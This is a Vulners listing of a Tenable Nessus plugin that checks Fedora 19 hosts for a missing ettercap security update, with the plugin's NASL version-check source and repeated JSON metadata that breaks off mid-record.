Search...

Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)

2015-01-05T00:00:00

ID FEDORA_2014-17210.NASL
Type nessus
Reporter Tenable
Modified 2015-10-19T00:00:00

Description

Fix for multiple CVEs.

https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi- 1402/

Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Fedora Security Advisory 2014-17210.
#

include("compat.inc");

if (description)
{
  script_id(80342);
  script_version("$Revision: 1.4 $");
  script_cvs_date("$Date: 2015/10/19 22:23:30 $");

  script_cve_id("CVE-2014-6395", "CVE-2014-6396", "CVE-2014-9376", "CVE-2014-9377", "CVE-2014-9378", "CVE-2014-9379", "CVE-2014-9380", "CVE-2014-9381");
  script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);
  script_xref(name:"FEDORA", value:"2014-17210");

  script_name(english:"Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Fix for multiple CVEs.

https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-
1402/

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.redhat.com/show_bug.cgi?id=1174821"
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147435.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?195ec4e5"
  );
  # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?55000fec"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Update the affected ettercap package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:ettercap");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:19");

  script_set_attribute(attribute:"patch_publication_date", value:"2014/12/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/05");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015 Tenable Network Security, Inc.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" &gt;!&lt; release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^19([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 19.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" &gt;!&lt; cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC19", reference:"ettercap-0.8.1-2.fc19")) flag++;


if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ettercap");
}

JSON Vulners Source

Initial Source

{"id": "FEDORA_2014-17210.NASL", "bulletinFamily": "scanner", "title": "Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)", "description": "Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi- 1402/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2015-01-05T00:00:00", "modified": "2015-10-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=80342", "reporter": "Tenable", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1174821", "http://www.nessus.org/u?195ec4e5", "http://www.nessus.org/u?55000fec"], "cvelist": ["CVE-2014-9381", "CVE-2014-9376", "CVE-2014-9377", "CVE-2014-6396", "CVE-2014-9378", "CVE-2014-9379", "CVE-2014-9380", "CVE-2014-6395"], "type": "nessus", "lastseen": "2019-02-21T01:23:09", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:ettercap"], "cvelist": ["CVE-2014-9381", "CVE-2014-9376", "CVE-2014-9377", "CVE-2014-6396", "CVE-2014-9378", "CVE-2014-9379", "CVE-2014-9380", "CVE-2014-6395"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi- 1402/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "2543b7aa1daabe465ec4b08c59cb0c36a7cbe118a824ad41cb6ec66bd2ac3f08", "hashmap": [{"hash": "159295b50f9d93a2f99cf6471805b8ab", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "86be0fa956e71c5ed59c4f008ad38617", "key": "references"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "d4acd75c362abdb9b13b54ce5ab478a6", "key": "cvelist"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "258f1404f999ee15929df2397cb1dfac", "key": "cpe"}, {"hash": "8fce9e3c8e65872eb4615fd74ef23a30", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "3fdf6f59fda8391da686d86e3a4ebba5", "key": "sourceData"}, {"hash": "773dce44d11b3eb526a9b2dde74bba95", "key": "title"}, {"hash": "9da2a07af58b3eb890ec708d400d743c", "key": "pluginID"}, {"hash": "89b897ffa1791367d61260d50e400cf5", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=80342", "id": "FEDORA_2014-17210.NASL", "lastseen": "2017-10-29T13:38:24", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "80342", "published": "2015-01-05T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1174821", "http://www.nessus.org/u?195ec4e5", "http://www.nessus.org/u?55000fec"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17210.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80342);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:30 $\");\n\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);\n script_xref(name:\"FEDORA\", value:\"2014-17210\");\n\n script_name(english:\"Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-\n1402/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1174821\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147435.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?195ec4e5\"\n );\n # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55000fec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ettercap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"ettercap-0.8.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ettercap\");\n}\n", "title": "Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:38:24"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2014-9381", "CVE-2014-9376", "CVE-2014-9377", "CVE-2014-6396", "CVE-2014-9378", "CVE-2014-9379", "CVE-2014-9380", "CVE-2014-6395"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi- 1402/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {}, "hash": "66933ba012d88a49dbe841c99be1d88683b31c2f4fdd9df76335b6c1d77b778e", "hashmap": [{"hash": "159295b50f9d93a2f99cf6471805b8ab", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "86be0fa956e71c5ed59c4f008ad38617", "key": "references"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "d4acd75c362abdb9b13b54ce5ab478a6", "key": "cvelist"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "8fce9e3c8e65872eb4615fd74ef23a30", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "3fdf6f59fda8391da686d86e3a4ebba5", "key": "sourceData"}, {"hash": "773dce44d11b3eb526a9b2dde74bba95", "key": "title"}, {"hash": "9da2a07af58b3eb890ec708d400d743c", "key": "pluginID"}, {"hash": "89b897ffa1791367d61260d50e400cf5", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=80342", "id": "FEDORA_2014-17210.NASL", "lastseen": "2016-09-26T17:24:41", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.2", "pluginID": "80342", "published": "2015-01-05T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1174821", "http://www.nessus.org/u?195ec4e5", "http://www.nessus.org/u?55000fec"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17210.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80342);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:30 $\");\n\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);\n script_xref(name:\"FEDORA\", value:\"2014-17210\");\n\n script_name(english:\"Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-\n1402/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1174821\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147435.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?195ec4e5\"\n );\n # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55000fec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ettercap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"ettercap-0.8.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ettercap\");\n}\n", "title": "Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:ettercap"], "cvelist": ["CVE-2014-9381", "CVE-2014-9376", "CVE-2014-9377", "CVE-2014-6396", "CVE-2014-9378", "CVE-2014-9379", "CVE-2014-9380", "CVE-2014-6395"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi- 1402/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "2543b7aa1daabe465ec4b08c59cb0c36a7cbe118a824ad41cb6ec66bd2ac3f08", "hashmap": [{"hash": "159295b50f9d93a2f99cf6471805b8ab", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "86be0fa956e71c5ed59c4f008ad38617", "key": "references"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "d4acd75c362abdb9b13b54ce5ab478a6", "key": "cvelist"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "258f1404f999ee15929df2397cb1dfac", "key": "cpe"}, {"hash": "8fce9e3c8e65872eb4615fd74ef23a30", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "3fdf6f59fda8391da686d86e3a4ebba5", "key": "sourceData"}, {"hash": "773dce44d11b3eb526a9b2dde74bba95", "key": "title"}, {"hash": "9da2a07af58b3eb890ec708d400d743c", "key": "pluginID"}, {"hash": "89b897ffa1791367d61260d50e400cf5", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=80342", "id": "FEDORA_2014-17210.NASL", "lastseen": "2018-09-01T23:47:27", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "80342", "published": "2015-01-05T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1174821", "http://www.nessus.org/u?195ec4e5", "http://www.nessus.org/u?55000fec"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17210.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80342);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:30 $\");\n\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);\n script_xref(name:\"FEDORA\", value:\"2014-17210\");\n\n script_name(english:\"Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-\n1402/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1174821\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147435.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?195ec4e5\"\n );\n # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55000fec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ettercap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"ettercap-0.8.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ettercap\");\n}\n", "title": "Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-09-01T23:47:27"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:ettercap"], "cvelist": ["CVE-2014-9381", "CVE-2014-9376", "CVE-2014-9377", "CVE-2014-6396", "CVE-2014-9378", "CVE-2014-9379", "CVE-2014-9380", "CVE-2014-6395"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-\n1402/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-01-16T20:20:33", "references": [{"idList": ["ASA-201503-12", "ASA-201503-13"], "type": "archlinux"}, {"idList": ["EDB-ID:35580"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:129673"], "type": "packetstorm"}, {"idList": ["GENTOO_GLSA-201505-01.NASL", "FEDORA_2014-17107.NASL", "FEDORA_2014-17090.NASL", "DEBIAN_DLA-126.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:31528", "SECURITYVULNS:VULN:14161"], "type": "securityvulns"}, {"idList": ["1337DAY-ID-23028"], "type": "zdt"}, {"idList": ["GLSA-201505-01"], "type": "gentoo"}, {"idList": ["OPENVAS:1361412562310869133", "OPENVAS:1361412562310868758", "OPENVAS:1361412562310868847", "OPENVAS:1361412562310869694", "OPENVAS:1361412562310869132", "OPENVAS:1361412562310868846", "OPENVAS:1361412562310121375"], "type": "openvas"}, {"idList": ["DEBIAN:DLA-126-1:8C386"], "type": "debian"}, {"idList": ["CVE-2014-9381", "CVE-2014-9376", "CVE-2014-9377", "CVE-2014-6396", "CVE-2014-9378", "CVE-2014-9379", "CVE-2014-9380", "CVE-2014-6395"], "type": "cve"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "d338bb2c6b8e68a27b26b6c87264968773b0f7fc57b25aaa01bc62038e959f1e", "hashmap": [{"hash": "159295b50f9d93a2f99cf6471805b8ab", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "86be0fa956e71c5ed59c4f008ad38617", "key": "references"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "d4acd75c362abdb9b13b54ce5ab478a6", "key": "cvelist"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "258f1404f999ee15929df2397cb1dfac", "key": "cpe"}, {"hash": 